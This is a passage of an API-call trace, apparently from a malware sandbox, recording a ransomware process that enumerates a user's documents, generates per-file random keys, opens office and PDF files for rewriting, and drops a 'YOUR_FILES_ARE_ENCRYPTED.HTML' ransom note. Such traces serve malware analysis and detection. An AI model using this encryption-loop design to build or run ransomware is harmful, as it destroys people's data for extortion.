(in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="B2") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="76") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="18") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="94") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="E8") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="45") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="97") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="23") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="74") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="11") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="EF") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="51") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="21") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="45") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="F3") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="AE") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="23") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="22") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="33") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="44") returned 2 [0166.679] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp" [0166.679] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.679] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.688] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d5e75d0, ftCreationTime.dwHighDateTime=0x1d7e2a5, ftLastAccessTime.dwLowDateTime=0x69763ca0, ftLastAccessTime.dwHighDateTime=0x1d7e72d, ftLastWriteTime.dwLowDateTime=0x69763ca0, ftLastWriteTime.dwHighDateTime=0x1d7e72d, nFileSizeHigh=0x0, nFileSizeLow=0x575f, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="XfvX6mEZdudE-A vLi.odp", cAlternateFileName="XFVX6M~1.ODP")) returned 0 [0166.688] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0166.688] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0166.688] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\f jtmrxpq5\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0166.689] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0166.691] 
CloseHandle (hObject=0x5b0) returned 1 [0166.692] GetProcessHeap () returned 0x270000 [0166.693] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0166.693] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1963880, ftCreationTime.dwHighDateTime=0x1d7dee8, ftLastAccessTime.dwLowDateTime=0x2676ad70, ftLastAccessTime.dwHighDateTime=0x1d7e24d, ftLastWriteTime.dwLowDateTime=0x2676ad70, ftLastWriteTime.dwHighDateTime=0x1d7e24d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="FIMjs52RRmmi4D7W", cAlternateFileName="FIMJS5~1")) returned 1 [0166.693] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W") returned 61 [0166.693] GetProcessHeap () returned 0x270000 [0166.693] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0166.693] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W" [0166.693] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\*" [0166.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1963880, ftCreationTime.dwHighDateTime=0x1d7dee8, ftLastAccessTime.dwLowDateTime=0x2676ad70, 
ftLastAccessTime.dwHighDateTime=0x1d7e24d, ftLastWriteTime.dwLowDateTime=0x2676ad70, ftLastWriteTime.dwHighDateTime=0x1d7e24d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0166.694] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1963880, ftCreationTime.dwHighDateTime=0x1d7dee8, ftLastAccessTime.dwLowDateTime=0x2676ad70, ftLastAccessTime.dwHighDateTime=0x1d7e24d, ftLastWriteTime.dwLowDateTime=0x2676ad70, ftLastWriteTime.dwHighDateTime=0x1d7e24d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0166.694] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9e7ee10, ftCreationTime.dwHighDateTime=0x1d7d8d1, ftLastAccessTime.dwLowDateTime=0x41ee08a0, ftLastAccessTime.dwHighDateTime=0x1d7ded8, ftLastWriteTime.dwLowDateTime=0x41ee08a0, ftLastWriteTime.dwHighDateTime=0x1d7ded8, nFileSizeHigh=0x0, nFileSizeLow=0x667a, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="bAUW4.pptx", cAlternateFileName="BAUW4~1.PPT")) returned 1 [0166.694] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx") returned 72 [0166.694] lstrcmpW (lpString1="bAUW4.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.694] PathFindExtensionW (pszPath="bAUW4.pptx") returned=".pptx" [0166.694] lstrlenW (lpString=".pptx") returned 5 [0166.694] PathFindExtensionW (pszPath="bAUW4.pptx") returned=".pptx" [0166.694] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.694] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\fimjs52rrmmi4d7w\\bauw4.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.696] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=26234) returned 1 [0166.696] GetProcessHeap () returned 0x270000 [0166.696] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.697] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="2A") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="54") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="96") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="E2") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="0D") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="96") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="D4") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="D0") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="21") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="BF") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="33") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="0A") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="D7") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="35") returned 2 [0166.697] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="FF") returned 2 [0166.697] 
wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="A1") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="46") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="C2") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="1A") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="6D") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="02") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="12") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="E0") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="BF") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="AB") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="26") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="8C") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="EA") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="8D") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="88") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="89") returned 2 [0166.698] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="0E") returned 2 [0166.699] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx" [0166.699] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, 
NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.699] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.709] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84eb4940, ftCreationTime.dwHighDateTime=0x1d7da75, ftLastAccessTime.dwLowDateTime=0xb9bc0e30, ftLastAccessTime.dwHighDateTime=0x1d7e48d, ftLastWriteTime.dwLowDateTime=0xb9bc0e30, ftLastWriteTime.dwHighDateTime=0x1d7e48d, nFileSizeHigh=0x0, nFileSizeLow=0x14cfb, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="DI5i-e 02AN.xls", cAlternateFileName="DI5I-E~1.XLS")) returned 1 [0166.709] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls") returned 77 [0166.709] lstrcmpW (lpString1="DI5i-e 02AN.xls", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.709] PathFindExtensionW (pszPath="DI5i-e 02AN.xls") returned=".xls" [0166.709] lstrlenW (lpString=".xls") returned 4 [0166.709] PathFindExtensionW (pszPath="DI5i-e 02AN.xls") returned=".xls" [0166.710] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\fimjs52rrmmi4d7w\\di5i-e 02an.xls"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.710] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=85243) returned 1 [0166.710] GetProcessHeap () returned 0x270000 [0166.710] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 
0x7690008 [0166.711] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="16") returned 2 [0166.711] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="E6") returned 2 [0166.711] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="56") returned 2 [0166.711] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="A9") returned 2 [0166.711] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="82") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="6E") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="14") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="76") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="3C") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="82") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="A0") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="7A") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="FE") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="54") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="A9") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="40") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="8E") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="E0") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="18") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="88") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="70") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd77e, 
param_2="%02X" | out: param_1="6B") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="8E") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="48") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="78") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="4A") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="D3") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="16") returned 2 [0166.713] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="3B") returned 2 [0166.713] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="58") returned 2 [0166.713] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="32") returned 2 [0166.713] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="66") returned 2 [0166.713] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls" [0166.713] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.714] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.724] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x545cdca0, ftCreationTime.dwHighDateTime=0x1d7d997, ftLastAccessTime.dwLowDateTime=0xa6789d0, ftLastAccessTime.dwHighDateTime=0x1d7dc24, ftLastWriteTime.dwLowDateTime=0xa6789d0, 
ftLastWriteTime.dwHighDateTime=0x1d7dc24, nFileSizeHigh=0x0, nFileSizeLow=0x6983, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="IE5ugm.pdf", cAlternateFileName="")) returned 1 [0166.724] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf") returned 72 [0166.724] lstrcmpW (lpString1="IE5ugm.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.724] PathFindExtensionW (pszPath="IE5ugm.pdf") returned=".pdf" [0166.724] lstrlenW (lpString=".pdf") returned 4 [0166.724] PathFindExtensionW (pszPath="IE5ugm.pdf") returned=".pdf" [0166.724] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\fimjs52rrmmi4d7w\\ie5ugm.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.725] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=27011) returned 1 [0166.725] GetProcessHeap () returned 0x270000 [0166.725] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.726] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="7A") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="36") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="0C") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="43") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="AE") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="DD") returned 2 [0166.726] wsprintfW (in: 
param_1=0x4ebd742, param_2="%02X" | out: param_1="75") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="6D") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="2D") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="2D") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="3A") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="CE") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="34") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="3B") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="E9") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="26") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="B9") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="9E") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="68") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="A9") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="66") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="CE") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="31") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="FF") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="78") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="F2") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="34") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="6D") returned 2 
[0166.727] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="D5") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="A7") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="25") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="73") returned 2 [0166.728] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf" [0166.728] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.728] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.741] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2155a00, ftCreationTime.dwHighDateTime=0x1d7e2bf, ftLastAccessTime.dwLowDateTime=0x4757aaa0, ftLastAccessTime.dwHighDateTime=0x1d7e5e8, ftLastWriteTime.dwLowDateTime=0x4757aaa0, ftLastWriteTime.dwHighDateTime=0x1d7e5e8, nFileSizeHigh=0x0, nFileSizeLow=0x9bd4, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="Jj5fVb4IcQEw.pps", cAlternateFileName="JJ5FVB~1.PPS")) returned 1 [0166.741] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps") returned 78 [0166.741] lstrcmpW (lpString1="Jj5fVb4IcQEw.pps", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.741] PathFindExtensionW (pszPath="Jj5fVb4IcQEw.pps") returned=".pps" [0166.741] lstrlenW (lpString=".pps") returned 4 [0166.741] 
PathFindExtensionW (pszPath="Jj5fVb4IcQEw.pps") returned=".pps" [0166.741] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\fimjs52rrmmi4d7w\\jj5fvb4icqew.pps"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.742] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=39892) returned 1 [0166.742] GetProcessHeap () returned 0x270000 [0166.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.743] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="D3") returned 2 [0166.743] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="A7") returned 2 [0166.743] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | 